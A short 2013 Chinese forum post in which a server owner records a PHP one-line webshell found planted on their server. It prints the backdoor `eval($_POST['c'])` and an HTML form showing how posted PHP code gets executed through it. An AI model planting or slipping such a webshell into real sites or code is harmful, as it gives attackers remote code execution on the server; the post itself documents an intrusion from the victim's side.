happysoul 发表于 2013-2-7 00:57:51

关于php一句话木马

服务器上发现被植了很多木马,而且还让人肆意使用...NND
<?php @eval($_POST['c']);?>

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
<html><body><form action="a.php" method="post"><input type="text" name="c" value="phpinfo();"><input type="submit" value="submit"></form></body></html>


http://dl.iteye.com/upload/attachment/0067/5613/754066b9-c56a-3efb-aafb-059421c761e8.jpg

http://dl.iteye.com/upload/attachment/0067/5615/6f25bd7a-be78-3c9e-b8f8-a1364e7fd3a4.jpg

仅此做个记录,php这东西真恶心
页: [1]
查看完整版本: 关于php一句话木马